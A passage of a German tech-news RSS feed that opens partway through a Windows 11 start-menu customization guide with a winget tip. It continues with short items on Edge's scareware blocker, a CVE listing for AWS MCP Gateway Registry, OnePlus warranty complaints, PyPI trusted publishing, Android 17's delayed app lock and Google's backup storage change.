<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da25c9e"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_5.jpg?quality=50&amp;strip=all" alt="Startzentrale: Das Windows- 11-Startmenü erfüllt seine Aufgabe, aber kaum mehr. Immerhin hat Microsoft inzwischen ein paar Optionen für individuelle Anpassungen nachgeliefert." class="wp-image-2934471" width="800" height="773" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Startzentrale: Das Windows- 11-Startmenü erfüllt seine Aufgabe, aber kaum mehr. Immerhin hat Microsoft inzwischen ein paar Optionen für individuelle Anpassungen nachgeliefert.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Sie können die Icons per Drag &amp; Drop umsortieren und ein Icon auf ein anderes ziehen, um einen Ordner zu bilden. Dem Ordner kann man auch einen Namen geben. </p>



<p>Weitere Programme fügen Sie aus der Liste unter „Alle“ zum Startmenü hinzu, indem Sie im Kontextmenü „An ‚Start‘ anheften“ wählen. Befindet es sich bereits dort, wird ihnen „Von ‚Start‘ lösen“ angeboten.</p>



<p>Wenn Sie mit der rechten Maustaste auf einen freien Bereich im Startmenü klicken, erscheint die Schaltfläche „Starteinstellungen“, die in der „Einstellungen“-App zu „Personalisierung –› Start“ führt. Das Fenster bietet neben „Standard“ die Layouts „Mehr angeheftete Elemente“ und „Mehr Empfehlungen“. </p>



<p>Außerdem können Sie mit den Schaltern „Zuletzt hinzugefügte App anzeigen“ und „Meistverwendete Apps anzeigen“ bestimmen, was im Startmenü erscheinen soll. Nach einem Klick auf „Ordner“ aktivieren Sie beispielsweise „Einstellungen“, „Datei-Explorer“ oder „Downloads“. </p>



<p>Die zugehörigen Icons erscheinen im Startmenü links neben dem Netzschaltersymbol – praktisch für den schnellen Zugriff auf die ausgewählten Elemente.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da266ee"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_6.jpg?quality=50&amp;strip=all" alt="Startmenü anpassen: Wenn Sie die App-Empfehlungen kaum verwenden, aber mehr Programme anheften wollen, können Sie das bei Windows 11 unter „Personalisierung –› Start“ festlegen." class="wp-image-2934475" width="973" height="598" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Startmenü anpassen: Wenn Sie die App-Empfehlungen kaum verwenden, aber mehr Programme anheften wollen, können Sie das bei Windows 11 unter „Personalisierung –› Start“ festlegen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p><strong>Alternative Software für Startmenü und Taskleiste</strong></p>



<p>Wer das Design von Windows 7 vermisst, installiert das kostenlose <a href="https://github.com/Open-Shell/Open-Shell-Menu" target="_blank" rel="noreferrer noopener">Open Shell Menu</a>. Das Tool ersetzt das Startmenü von Windows 11 komplett und zeigt die von Windows 7 gewohnten Menüeinträge und Schaltflächen.</p>



<p>Nach der Installation erscheint nach einem Klick auf die Schaltfläche „Start“ ein Konfigurationsdialog. Hier legen Sie fest, wie das neue Startmenü aussehen soll. Das Original-Windows-Startmenü lässt sich weiterhin aufrufen. Dazu halten Sie die Shift-Taste gedrückt und klicken auf die Schaltfläche „Start“.</p>



<p><a href="https://stardock.pxf.io/c/230135/1292592/15833?u=https://www.stardock.com/products/start11/&amp;subid1=rss" target="_blank" rel="noreferrer noopener">Start 11</a> bietet nützliche Anpassungen für das Windows-Startmenü und die Taskleiste. Es sind zahlreiche Optionen verfügbar, beispielsweise abgerundete Ecken, veränderbare Transparenz und die Positionierung der Taskleiste am oberen Bildschirmrand. Windows 11 erlaubt nur die zentrierte oder linksbündige Ausrichtung am unteren Bildschirmrand. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da27047"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_7.jpg?quality=50&amp;strip=all" alt="Individuelles Startmenü: Start 11 ermöglicht zahlreiche Anpassungen für Startmenü und Taskleiste. Wer möchte, kann auch ein Menü im Stil von Windows 7 verwenden." class="wp-image-2934476" width="934" height="556" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Individuelles Startmenü: Start 11 ermöglicht zahlreiche Anpassungen für Startmenü und Taskleiste. Wer möchte, kann auch ein Menü im Stil von Windows 7 verwenden.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p><a href="https://www.startallback.com/" target="_blank" rel="noreferrer noopener">Start All Back</a> bietet ähnliche Funktionen wie Open Shell Menu, was das Startmenü betrifft. Es sind aber mehr Optionen für individuelle Anpassungen verfügbar. </p>



<p>Interessant ist das Tool für Nutzer, die die Taskleiste oben oder vertikal links oder rechts anordnen möchten. Beim Windows-Explorer erhalten Sie auf Wunsch die Ribbon-Leiste von Windows 10 zurück. Das klassische Kontextmenü kann Start All Back ebenfalls wiederherstellen.</p>



<p><a href="https://punklabs.com/rocketdock" target="_blank" rel="noreferrer noopener">Rocket Dock</a> ist kostenlos und als Programmstarter ein guter Ersatz für die in Windows 11 weggefallenen Symbolleisten in der Taskbar. Das Tool zeigt eine Leiste am oberen Bildschirmrand mit animierten Starter-Icons im Mac-OS-Stil, die zu Ordnern wie „Dokumente“ oder „Bilder“ führen. </p>



<p>Ziehen Sie Verknüpfungen zu Desktop-Programmen oder ausführbaren Dateien auf das Dock, um Starter hinzuzufügen. Wenn Sie Apps in das Dock aufnehmen möchten, drücken Sie die Tastenkombination Win-R, geben </p>



<pre class="wp-block-code"><code>shell:AppsFolder </code></pre>



<p>ein und klicken danach auf „OK“. Klicken Sie die gewünschte App an und wählen Sie im Kontextmenü „Verknüpfung erstellen“. Erteilen Sie mit „Ja“ die Erlaubnis für eine Verknüpfung auf dem Desktop. Ziehen Sie die Verknüpfung auf das Dock und klicken Sie im Kontextmenü auf „Symbol-Eigenschaften“. </p>



<p>In das Eingabefeld „Ziel“ setzen Sie shell:AppsFolder/ vor den Programmnamen und klicken auf „OK“.</p>



<div class="wp-block-idg-base-theme-box-text inline-box">
<h2 class="wp-block-heading toc">Winget: Software schnell installieren</h2>



<p>Bei einem frisch installierten Windows müssen Sie zuerst die Software einrichten, die Sie für gewöhnlich nutzen. Wenn Sie hauptsächlich Open-Source-Software oder andere Gratis-Programme einsetzen, bietet Windows 11 einen schnellen Weg zur Software-Grundausstattung.</p>



<p>Öffnen Sie das Windows-Terminal als Administrator und starten Sie die Befehlszeile</p>



<p><em>winget search 7-Zip</em></p>



<p>Beim ersten Aufruf müssen Sie die Nutzungsbedingungen von Microsoft akzeptieren. Das Tool gibt Ihnen als Suchergebnis die ID des Programms aus, bei unserem Beispiel „7zip.7zip“. Um beispielsweise Libre Office, 7-Zip, Adobe Acrobat DC und Notepad++ in einem Rutsch zu installieren, verwenden Sie die Zeile</p>



<p><em>winget install TheDocumentFoundation.LibreOffice 7zip.7zip XPDP273C0XHQH2 Notepad++.Notepad++</em></p>



<p>Sollte Ihnen die Benutzung im Terminal zu umständlich erscheinen, verwenden Sie Uniget UI, eine grafische Oberfläche für Winget.</p>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So aktivieren Sie den Scareware-Blocker in Microsoft Edge]]></title>
<description><![CDATA[Der Edge-Browser in Microsoft enthält einen Scareware-Blocker, der jedoch eventuell zunächst aktiviert werden muss. Unter Scareware (to scare = erschrecken) versteht man Webseiten, die versuchen, dem Besucher einen Schreck einzujagen und ihn in seiner Panik zu bestimmten Handlungen zu bewegen.


...]]></description>
<link>https://tsecurity.de/de/3653379/windows-tipps/so-aktivieren-sie-den-scareware-blocker-in-microsoft-edge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653379/windows-tipps/so-aktivieren-sie-den-scareware-blocker-in-microsoft-edge/</guid>
<pubDate>Wed, 08 Jul 2026 08:08:36 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Der Edge-Browser in Microsoft enthält einen Scareware-Blocker, der jedoch eventuell zunächst aktiviert werden muss. Unter Scareware (to scare = erschrecken) versteht man Webseiten, die versuchen, dem Besucher einen Schreck einzujagen und ihn in seiner Panik zu bestimmten Handlungen zu bewegen.</p>



<p>Typisch sind etwa sich plötzlich im Vollformat öffnende Seiten, die falsche Virenwarnungen ausgeben oder auf gefährliche Sicherheitslücken hinweisen, die es tatsächlich nicht gibt. Oft ertönen dabei laute Alarmsignale oder es erscheinen simulierte Systemmeldungen.</p>



<p>Das Ziel der Betrüger hinter der Scareware ist, dass der Benutzer eine Schutzsoftware herunterlädt (bei der es sich tatsächlich jedoch um einen Virus handelt) oder einem angeblichen Experten einen Remote-Zugang zu seinem Computer öffnet. Der Scareware-Blocker von Edge arbeitet mit KI, um solche Fake-Seiten zu identifizieren und Sie vor dem Besuch zu warnen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4de95769bd5"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/scareware_RGBeci.jpg?quality=50&amp;strip=all" alt="Scareware-Blocker in Microsoft Edge " class="wp-image-3141138" width="892" height="768" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Der Scareware-Blocker in Microsoft Edge ist auf den meisten Computern bereits in der Voreinstellung aktiv und warnt vor dem Besuch von Websites, die den Besucher mit Alarmmeldungen zu unüberlegten Handlungen verleiten sollen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Diese Analyse erfolgt rein lokal, es werden keine Screenshots oder andere Bilder des eigenen Computers an Microsoft übermittelt. Was allerdings übermittelt wird, sind die Adressen dieser Seiten. Sie gehen an den Microsoft Defender Smartscreen, eine Datenbank, die Nutzer bereits bei der Eingabe der Adresse einer gefährlichen Webseite auf die Risiken hinweist.</p>



<p>Auf den meisten Windows-PCs ist der Scareware-Blocker in der Voreinstellung aktiviert. Sie finden ihn in Edge nach einem Klick auf das Zahnradsymbol rechts unten unter „Datenschutz, Suche und Dienste –› Sicherheit“. Mit dem Schalter bei „Scareware-Blocker“ aktivieren und deaktivieren Sie die KI-Analyse der Funktion.</p>



<p>Mit „Websites blockieren, die als Betrug erkannt wurden“ steuern Sie, ob bereits bekannte betrügerische Websites blockiert werden sollen. Und mit „Erkannte Betrugswebsites mit Microsoft Defender Smartscreen teilen“ erlauben Sie das Übermitteln der Adresse einer Scareware-Seite an Microsoft.</p>



<p>Die Funktion ist aktiv auf allen Computern, die über mehr als 2 GB Arbeitsspeicher und eine CPU mit mindestens fünf Kernen verfügen. Bei allen anderen PCs muss der Scareware-Blocker zuerst eingeschaltet werden. Bei PCs mit weniger als 1 GB RAM und nur einem CPU-Kern ist er nicht verfügbar.</p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/1161670/die-besten-gratis-tools-antivirus.html" target="_blank" rel="noreferrer noopener">Die besten Gratis-Tools gegen Viren und Malware</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14471 | AWS MCP Gateway Registry up to 1.0.12 Retention Policy Management table_name neutralization (EUVD-2026-41939)]]></title>
<description><![CDATA[A vulnerability was found in AWS MCP Gateway Registry up to 1.0.12 and classified as critical. Affected is an unknown function of the component Retention Policy Management. Such manipulation of the argument table_name leads to improper neutralization.

This vulnerability is uniquely identified as...]]></description>
<link>https://tsecurity.de/de/3652207/sicherheitsluecken/cve-2026-14471-aws-mcp-gateway-registry-up-to-1012-retention-policy-management-tablename-neutralization-euvd-2026-41939/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652207/sicherheitsluecken/cve-2026-14471-aws-mcp-gateway-registry-up-to-1012-retention-policy-management-tablename-neutralization-euvd-2026-41939/</guid>
<pubDate>Tue, 07 Jul 2026 18:39:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/aws:mcp_gateway_registry">AWS MCP Gateway Registry up to 1.0.12</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the component <em>Retention Policy Management</em>. Such manipulation of the argument <em>table_name</em> leads to improper neutralization.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-14471">CVE-2026-14471</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Vorwurf: OnePlus drückt sich vor Garantieverpflichtungen]]></title>
<description><![CDATA[Mehrere Nutzer auf Reddit berichten, dass sie Probleme mit der Garantieabwicklung von OnePlus in Europa hatten, wie die Seite Android Authority meldet. Den Nutzern zufolge hat das Unternehmen Gutscheine im Wert von 100 Euro angeboten, anstatt defektes Zubehör wie Kopfhörer zu ersetzen, die noch u...]]></description>
<link>https://tsecurity.de/de/3651903/it-nachrichten/vorwurf-oneplus-drueckt-sich-vor-garantieverpflichtungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651903/it-nachrichten/vorwurf-oneplus-drueckt-sich-vor-garantieverpflichtungen/</guid>
<pubDate>Tue, 07 Jul 2026 16:47:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Mehrere Nutzer auf Reddit <a href="https://www.reddit.com/r/oneplus/comments/1uo6lri/beware_of_oneplus_eu_warranty_offering_useless/" target="_blank" rel="noreferrer noopener">berichten</a>, dass sie Probleme mit der Garantieabwicklung von OnePlus in Europa hatten, wie die Seite <a href="https://www.androidauthority.com/oneplus-eu-warranty-swapped-for-useless-voucher-3684328/">Android Authority</a> meldet. Den Nutzern zufolge hat das Unternehmen Gutscheine im Wert von 100 Euro angeboten, anstatt defektes Zubehör wie Kopfhörer zu ersetzen, die noch unter die gesetzliche Gewährleistung fallen.</p>



<p><a href="https://www.pcwelt.de/article/3033893/oneplus-15r-test.html" target="_blank" rel="noreferrer noopener">OnePlus</a> soll diese Entscheidung damit begründet haben, dass die Produkte das Ende ihres Lebenszyklus erreicht hätten oder nicht mehr vorrätig seien.</p>



<p>Das Problem besteht laut den Nutzern darin, dass die Gutscheine nur begrenzt einsetzbar sind. Sie gelten ausschließlich im OnePlus-Onlineshop, können nicht mit bereits reduzierten Produkten kombiniert werden, sind weder in stationären Geschäften noch für zukünftige Reparaturen einlösbar und zudem nur einen Monat lang gültig.</p>



<p>OnePlus selbst hat sich zu diesen Angaben nicht geäußert. Die Berichte erscheinen zeitgleich mit Gerüchten, wonach das Unternehmen seine Aktivitäten in mehreren westlichen Ländern zurückfahren soll. Diese halten sich wacker<a href="https://www.china-gadgets.de/ende-von-oneplus/" target="_blank" rel="noreferrer noopener"> seit Anfang des Jahres</a>, wobei OnePlus auch hierzu keine Aussage treffen möchte. </p>



<p>Experten gehen davon aus, dass OnePlus lediglich als Submarke von Oppo fortbestehen könnte. Zeitgleich scheint der Warenbestand von OnePlus-Produkten aktuell zu schwinden.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/3184139/die-spannendsten-smartphones-die-2026-noch-auf-den-markt-kommen.html" target="_blank" rel="noreferrer noopener">Die 5 spannendsten Smartphones, die 2026 noch auf den Markt kommen</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Woodruff: You shouldn't trust trusted publishing]]></title>
<description><![CDATA[William Woodruff, better known online as "yossarian", has published
a blog post to make the case that users should not place their trust
in trusted
publishing:


Trusted Publishing is a mechanism for establishing trust between an
external machine identity (like a CI/CD workflow) and one or more
p...]]></description>
<link>https://tsecurity.de/de/3651890/linux-tipps/woodruff-you-shouldnt-trust-trusted-publishing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651890/linux-tipps/woodruff-you-shouldnt-trust-trusted-publishing/</guid>
<pubDate>Tue, 07 Jul 2026 16:40:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>William Woodruff, better known online as "yossarian", has <a href="https://blog.yossarian.net/2026/07/07/You-shouldnt-trust-trusted-publishing">published</a>
a blog post to make the case that users should not place their trust
in <a href="https://docs.pypi.org/trusted-publishers/">trusted
publishing</a>:</p>

<blockquote class="bq">
<p>Trusted Publishing is a mechanism for establishing trust between an
external machine identity (like a CI/CD workflow) and one or more
projects on a package index/registry. The "trust" in "Trusted
Publishing" refers to that trust relationship, and not to anything
else.</p>

<p>It is not, and cannot be, a signal for package trust or
quality. You cannot use it to determine whether a package is safe or
"good," and PyPI consciously stymies attempts to misuse it for that
purpose by not rendering it as a "green checkmark" or anything else of
the sort.</p>

<p>Or as another framing: Trusted Publishing is just a form of
authentication. It doesn't tell you anything other than that an upload
was authenticated, which all uploads to PyPI are.</p>
</blockquote>

<p>LWN <a href="https://lwn.net/Articles/1076205/">covered</a> trusted
publishing in June.</p>

<p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17: Diese wichtige Funktion wird nicht mehr rechtzeitig fertig]]></title>
<description><![CDATA[Google hat bereits Mitte Juni mit dem Rollout von Android 17 gestartet und liefert das Update an die ersten Nutzer aus, die ein Google Pixel besitzen. Allerdings sind noch längst nicht alle versprochenen Funktionen mit an Bord (siehe Android 17: Alle Infos zum nächsten großen System-Update).



Z...]]></description>
<link>https://tsecurity.de/de/3651678/it-nachrichten/android-17-diese-wichtige-funktion-wird-nicht-mehr-rechtzeitig-fertig/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651678/it-nachrichten/android-17-diese-wichtige-funktion-wird-nicht-mehr-rechtzeitig-fertig/</guid>
<pubDate>Tue, 07 Jul 2026 15:33:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google hat bereits Mitte Juni mit dem Rollout von Android 17 <a href="https://www.pcwelt.de/article/3167761/android-17-endlich-da-so-bekommen-sie-jetzt-das-update.html" target="_blank" rel="noreferrer noopener">gestartet</a> und liefert das Update an die ersten Nutzer aus, die ein Google Pixel besitzen. Allerdings sind noch längst nicht alle versprochenen Funktionen mit an Bord (siehe <a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">Android 17: Alle Infos zum nächsten großen System-Update</a>).</p>



<p>Zwar gibt es in der neuen Version des Betriebssystems einige grundlegende Änderungen, <a href="https://www.pcwelt.de/article/3170864/android-17-diese-vier-versteckten-funktionen-machen-ihr-betriebssystem-deutlich-sicherer.html" target="_blank" rel="noreferrer noopener">die die Sicherheit von Android verbessern</a>. Doch speziell die App-Sperre müssen alle, die das Update bereits bekommen haben, noch schmerzlich vermissen.</p>



<p>Eigentlich wollte Google damit Nutzern ermöglichen, individuelle Sperren für bestimmte Apps festzulegen. Sie können also beispielsweise eine bestimmte Banking-App, Ihr Mail-Postfach oder Whatsapp mit einer Sperre versehen, die sich nur per PIN oder biometrischem Code wieder entfernen lässt. </p>



<p>Dieses Feature war eigentlich fest versprochen für den Release von Android 17, und Google hat sich offiziell nicht dazu geäußert, warum es jetzt fehlt. Die Seite <a href="https://www.smartdroid.de/android-17-auf-google-pixel-neue-app-sperre-kommt-verspaetet-mit-neuen-funktionen/" target="_blank" rel="noreferrer noopener">Android Authority</a> hat im Code der Android 17 QPR1 Beta 6 nun aber einige Hinweise auf die Funktion entdeckt.</p>



<p>Demnach hat Google die App-Sperre noch nicht aufgegeben. Im Gegenteil, das Unternehmen arbeitet aktiv an der Option und möchte sie wohl sogar erweitern. Statt wie bisher angenommen für jede App einzeln eine Sperre festzulegen, können Nutzer demnach gleich mehrere Anwendungen gleichzeitig so konfigurieren, wie sie es möchten.</p>



<p>Diese Option wird über die Systemeinstellungen verfügbar sein. Außerdem sollen besonders geschützte Anwendungen wohl nur über biometrische Merkmale entsperrt werden können, um für noch mehr Sicherheit zu sorgen. Mit einer PIN käme man in diesem Fall nicht weiter.</p>



<p>All diese Einstellungen sollen natürlich dafür sorgen, dass Android-Smartphones im Falle eines <a href="https://www.pcwelt.de/article/2283806/verlorenes-smartphone-sperren-daten-loeschen.html" target="_blank" rel="noreferrer noopener">Verlusts </a>oder <a href="https://www.pcwelt.de/article/2335056/android-handy-diebstahlschutz-theft-detection-lock-ab-android-10.html" target="_blank" rel="noreferrer noopener">Diebstahls </a>besser geschützt sind. Wenn eine Person es schafft, unerlaubt Zugriff auf Ihr Gerät zu bekommen, kann so zumindest verhindert werden, dass derjenige auf Apps zugreift, mit denen er Bankdaten oder andere sensible Informationen abrufen kann.</p>



<h2 class="wp-block-heading">Wann kommt die Funktion?</h2>



<p>Noch ist unklar, wann Google diese Funktion für Android 17 freigeben wird. Scheinbar ist sie noch nicht fertig entwickelt und es ist zwar unwahrscheinlich, aber nicht unmöglich, dass sie mit der Android 17 QPR1 im Herbst erscheinen wird. </p>



<p>Wir gehen jedenfalls nicht davon aus, dass Google sie rechtzeitig vor dem Rollout von Android 17 für andere Smartphone-Hersteller wie Samsung, Xiaomi, Oppo und Co. freigeben wird.</p>



<p><strong>Lesetipps:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">Alle Android-Nutzer bekommen jetzt diese wichtige Backup-Funktion</a></li>



<li><a href="https://www.pcwelt.de/article/3182659/android-17-reduziert-versuche-bei-der-pin-eingabe-drastisch-der-grund.html" target="_blank" rel="noreferrer noopener">Android 17 reduziert Versuche bei der PIN-Eingabe drastisch: Der Grund</a></li>



<li><a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update</a></li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern ab sofort kein Gratis-Backup mehr]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3651275/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651275/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</guid>
<pubDate>Tue, 07 Jul 2026 13:03:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer tritt die Änderung ab heute, 7. Juli 2026, in Kraft. Für bestehende Nutzer wird sie in den kommenden Monaten schrittweise eingeführt.</p>



<p>Laut Google werden die Auswirkungen dieser Änderung voraussichtlich begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa 40 Megabyte zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



